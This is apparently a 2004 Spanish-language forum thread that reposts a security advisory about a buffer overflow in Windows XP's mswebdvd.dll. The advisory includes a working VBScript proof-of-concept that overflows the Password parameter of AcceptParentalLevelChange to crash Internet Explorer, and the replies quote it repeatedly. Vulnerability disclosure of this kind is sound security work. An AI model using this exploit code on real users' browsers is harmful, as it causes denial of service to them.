[AVISO] Windows XP 'mswebdvd.dll' Vulnerable

07/04/2004 - 14:25 por Ille Corvus | Informe spam
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users
Deny Service

DATE: Apr 6 2004

IMPACT: Denial of service via network

EXPLOIT INCLUDED: YES

VERSION(s): XP SP1, SP2

DESCRIPTION: Rafel Ivgi (The-Insider) reported a vulnerability in
Microsoft Windows XP in 'mswebdvd.dll'. A remote user can cause denial
of service conditions.

It is reported that a remote user can create HTML that loads the
'MSWebDVD.MSWebDVD.1' active scripting object with specially crafted
parameters for the AcceptParentalLevelChange() function to cause the
target user's Internet Explorer browser to crash. According to the
report, setting the 'Password' parameter to a value longer than 255
characters trigger the flaw.

Some demonstration exploit HTML is provided in the Source Message.
Impact: A remote user can create HTML that, when loaded by the target
user, will cause the target user's Internet Explorer browser to crash.
Solution: No solution was available at the time of this entry.
Vendor URL: www.microsoft.com/technet/security/ (Links to External
Site)

Cause: Boundary error
Underlying OS: Windows (XP)
OS Comments: XP SP1, SP2
Reported By: Rafel Ivgi, The-Insider <theinsider@012.net.il>
Message History: None.

Source Message Contents
Date: Tue, 6 Apr 2004 10:14:31 +0200
From: Rafel Ivgi, The-Insider <theinsider@012.net.il>
Subject: MSWebDVD Class(mswebdvd.dll) Null Pointer Assignment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: MSWebDVD Class(mswebdvd.dll)
Vendors: http://www.microsoft.com
Platforms: WindowsXP Professional,SP1,SP2
Bug: Null Pointer Assignment
Risk: Medium - Denial Of Service
Exploitation: Remote with browser
Date: 1 Apr 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==1) Introduction
==
"mswebdvd.dll" is module that allows watching DVD films from websites.
Using active scripting an "MSWebDVD.MSWebDVD.1" object can be created
and the user can watch online DVD films .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==2) Bug
==
The "mswebdvd.dll" module was not correctly designed/checked the
parametres that are being sent to the "AcceptParentalLevelChange"
function. Therefore it is possible to D.O.S/CRASH Internet Explorer
remotly.

The function :
object = MSWebDVD.MSWebDVD.1
object.AcceptParentalLevelChange (boolean value),UserName as
string,Password as string

Setting the "Password" value with a string longer then 255 chars will
cause the overflow.

Unfortunatly this vulnerability effects all WindowsXP versions after
all patches and after SP1+SP2.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
=3) The Code
=
This is Proof Of Concept Code:
- CUT HERE -
<script language=vbscript>
'On Error Resume Next
dim mymy2,a

a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA"
a= a &
"ABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBB"
a= a &
"BCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCC"
a= a &
"CDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDD"
a= a &
"DEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEE"
a= a &
"EFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFF"
a= a &
"FGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGG"
a= a &
"GHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHH"
a= a &
"HIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIII"
a= a &
"IJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJ"
a= a &
"JKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
KKKKK"
a= a &
"KLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLL"
a= a &
"LMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMM"
a= a &
"M1234567899876543211112222333344445555666677778888999998761234rafiisthekingofthebufferoverflows
oyoucansuckmydickcauseiamtheinsiderandiamthebestgolookforyou03923610"
Set mymy2= CreateObject("MSWebDVD.MSWebDVD.1")
mymy2.AcceptParentalLevelChange False, "xc", a

</script>
- CUT HERE -
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Only the one who sees the invisible , Can do the Impossible."
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Fuente: http://www.securitytracker.com/aler...09673.html



Windows equispe SP1 y SP2 tienen esta vulnerabilidad de momento no hay
solucion disponible.



Ille Corvus. In Aeternum.
Meritorios de Filtrado (Kill-file):
tella llop, jm (N.B. 2003.10.25)

Preguntas similare

Leer las respuestas

#1 scchummi
07/04/2004 - 14:45 | Informe spam
Ille Corvus wrote :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-> Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users
Deny Service

DATE: Apr 6 2004

IMPACT: Denial of service via network

EXPLOIT INCLUDED: YES

VERSION(s): XP SP1, SP2

DESCRIPTION: Rafel Ivgi (The-Insider) reported a vulnerability in
Microsoft Windows XP in 'mswebdvd.dll'. A remote user can cause denial
of service conditions.

It is reported that a remote user can create HTML that loads the
'MSWebDVD.MSWebDVD.1' active scripting object with specially crafted
parameters for the AcceptParentalLevelChange() function to cause the
target user's Internet Explorer browser to crash. According to the
report, setting the 'Password' parameter to a value longer than 255
characters trigger the flaw.

Some demonstration exploit HTML is provided in the Source Message.
Impact: A remote user can create HTML that, when loaded by the target
user, will cause the target user's Internet Explorer browser to crash.
Solution: No solution was available at the time of this entry.
Vendor URL: www.microsoft.com/technet/security/ (Links to External
Site)

Cause: Boundary error
Underlying OS: Windows (XP)
OS Comments: XP SP1, SP2
Reported By: Rafel Ivgi, The-Insider
Message History: None.

Source Message Contents
Date: Tue, 6 Apr 2004 10:14:31 +0200
From: Rafel Ivgi, The-Insider
Subject: MSWebDVD Class(mswebdvd.dll) Null Pointer Assignment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: MSWebDVD Class(mswebdvd.dll)
Vendors: http://www.microsoft.com
Platforms: WindowsXP Professional,SP1,SP2
Bug: Null Pointer Assignment
Risk: Medium - Denial Of Service
Exploitation: Remote with browser
Date: 1 Apr 2004
Author: Rafel Ivgi, The-Insider
e-mail:
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==> 1) Introduction
==>
"mswebdvd.dll" is module that allows watching DVD films from websites.
Using active scripting an "MSWebDVD.MSWebDVD.1" object can be created
and the user can watch online DVD films .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==> 2) Bug
==>
The "mswebdvd.dll" module was not correctly designed/checked the
parametres that are being sent to the "AcceptParentalLevelChange"
function. Therefore it is possible to D.O.S/CRASH Internet Explorer
remotly.

The function :
object = MSWebDVD.MSWebDVD.1
object.AcceptParentalLevelChange (boolean value),UserName as
string,Password as string

Setting the "Password" value with a string longer then 255 chars will
cause the overflow.

Unfortunatly this vulnerability effects all WindowsXP versions after
all patches and after SP1+SP2.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
=> 3) The Code
=>
This is Proof Of Concept Code:
- CUT HERE -
<script language=vbscript>
'On Error Resume Next
dim mymy2,a

a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA"
a= a &
"ABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBB"
a= a &
"BCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCC"
a= a &
"CDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDD"
a= a &
"DEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEE"
a= a &
"EFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFF"
a= a &
"FGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGG"
a= a &
"GHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHH"
a= a &
"HIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIII"
a= a &
"IJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJ"
a= a &
"JKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
KKKKK"
a= a &
"KLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLL"
a= a &
"LMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMM"
a= a &
"M1234567899876543211112222333344445555666677778888999998761234rafiisthekingofthebufferoverflows
oyoucansuckmydickcauseiamtheinsiderandiamthebestgolookforyou03923610"
Set mymy2= CreateObject("MSWebDVD.MSWebDVD.1")
mymy2.AcceptParentalLevelChange False, "xc", a

</script>
- CUT HERE -
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Only the one who sees the invisible , Can do the Impossible."
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-> Fuente: http://www.securitytracker.com/aler...09673.html



Windows equispe SP1 y SP2 tienen esta vulnerabilidad de momento no hay
solucion disponible.



Ille Corvus. In Aeternum.



Gracias A ver el tiempo que tardan en solucionarlo.

This is an automatic signature of MesNews.
Site : http://mesnews.no-ip.com
Respuesta Responder a este mensaje
#2 Anonimo
09/04/2004 - 07:18 | Informe spam
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=->Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets
Remote Users
Deny Service

DATE: Apr 6 2004

IMPACT: Denial of service via network

EXPLOIT INCLUDED: YES

VERSION(s): XP SP1, SP2

DESCRIPTION: Rafel Ivgi (The-Insider) reported a


vulnerability in
Microsoft Windows XP in 'mswebdvd.dll'. A remote user


can cause denial
of service conditions.

It is reported that a remote user can create HTML that


loads the
'MSWebDVD.MSWebDVD.1' active scripting object with


specially crafted
parameters for the AcceptParentalLevelChange() function


to cause the
target user's Internet Explorer browser to crash.


According to the
report, setting the 'Password' parameter to a value


longer than 255
characters trigger the flaw.

Some demonstration exploit HTML is provided in the


Source Message.
Impact: A remote user can create HTML that, when loaded


by the target
user, will cause the target user's Internet Explorer


browser to crash.
Solution: No solution was available at the time of this


entry.
Vendor URL: www.microsoft.com/technet/security/ (Links


to External
Site)

Cause: Boundary error
Underlying OS: Windows (XP)
OS Comments: XP SP1, SP2
Reported By: Rafel Ivgi, The-Insider



Message History: None.

Source Message Contents
Date: Tue, 6 Apr 2004 10:14:31 +0200
From: Rafel Ivgi, The-Insider
Subject: MSWebDVD Class(mswebdvd.dll) Null Pointer


Assignment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~
Application: MSWebDVD Class(mswebdvd.dll)
Vendors: http://www.microsoft.com
Platforms: WindowsXP Professional,SP1,SP2
Bug: Null Pointer Assignment
Risk: Medium - Denial Of Service
Exploitation: Remote with browser
Date: 1 Apr 2004
Author: Rafel Ivgi, The-Insider
e-mail:
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~
==>1) Introduction
==>
"mswebdvd.dll" is module that allows watching DVD films


from websites.
Using active scripting an "MSWebDVD.MSWebDVD.1" object


can be created
and the user can watch online DVD films .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~
==>2) Bug
==>
The "mswebdvd.dll" module was not correctly


designed/checked the
parametres that are being sent to


the "AcceptParentalLevelChange"
function. Therefore it is possible to D.O.S/CRASH


Internet Explorer
remotly.

The function :
object = MSWebDVD.MSWebDVD.1
object.AcceptParentalLevelChange (boolean


value),UserName as
string,Password as string

Setting the "Password" value with a string longer then


255 chars will
cause the overflow.

Unfortunatly this vulnerability effects all WindowsXP


versions after
all patches and after SP1+SP2.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~
=>3) The Code
=>
This is Proof Of Concept Code:
- CUT HERE -
<script language=vbscript>
'On Error Resume Next
dim mymy2,a

a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA"
a= a &
"ABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB


BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB


BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBB"
a= a &
"BCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC


CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC


CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCC"
a= a &
"CDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD


DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD


DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDD"
a= a &
"DEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE


EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE


EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEE"
a= a &
"EFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF


FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF


FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFF"
a= a &
"FGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG


GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG


GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGG"
a= a &
"GHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH


HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH


HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHH"
a= a &
"HIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII


IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII


IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIII"
a= a &
"IJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ


JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ


JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJ"
a= a &
"JKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
KKKKK"
a= a &
"KLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL


LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL


LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLL"
a= a &
"LMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMM"
a= a &
"M1234567899876543211112222333344445555666677778888999998


761234rafiisthekingofthebufferoverflows
oyoucansuckmydickcauseiamtheinsiderandiamthebestgolookfor


you03923610"
Set mymy2= CreateObject("MSWebDVD.MSWebDVD.1")
mymy2.AcceptParentalLevelChange False, "xc", a

</script>
- CUT HERE -
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~

Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Only the one who sees the invisible , Can do the


Impossible."
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=->Fuente:
http://www.securitytracker.com/aler...009673.htm
l



Windows equispe SP1 y SP2 tienen esta vulnerabilidad de


momento no hay
solucion disponible.



Ille Corvus. In Aeternum.
Meritorios de Filtrado (Kill-file):
tella llop, jm (N.B. 2003.10.25)
.

Respuesta Responder a este mensaje
#3 Anonimo
09/04/2004 - 07:20 | Informe spam
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


